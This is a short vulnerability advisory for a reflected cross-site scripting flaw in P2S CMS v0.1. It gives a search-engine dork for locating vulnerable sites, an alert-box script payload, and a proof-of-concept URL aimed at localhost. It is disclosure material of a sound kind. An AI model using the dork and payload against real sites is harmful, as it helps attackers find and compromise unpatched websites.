P2S CMS version 0.1 suffers from a cross site scripting vulnerability.
====================================================================================================================================
| # Title : P2s-cms v0.1 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://www.primestart.net/ |
| # Dork : index.php?page=busca&palavra= |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Use Payload : <script>alert(/indoushka/);</script>
[+] http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
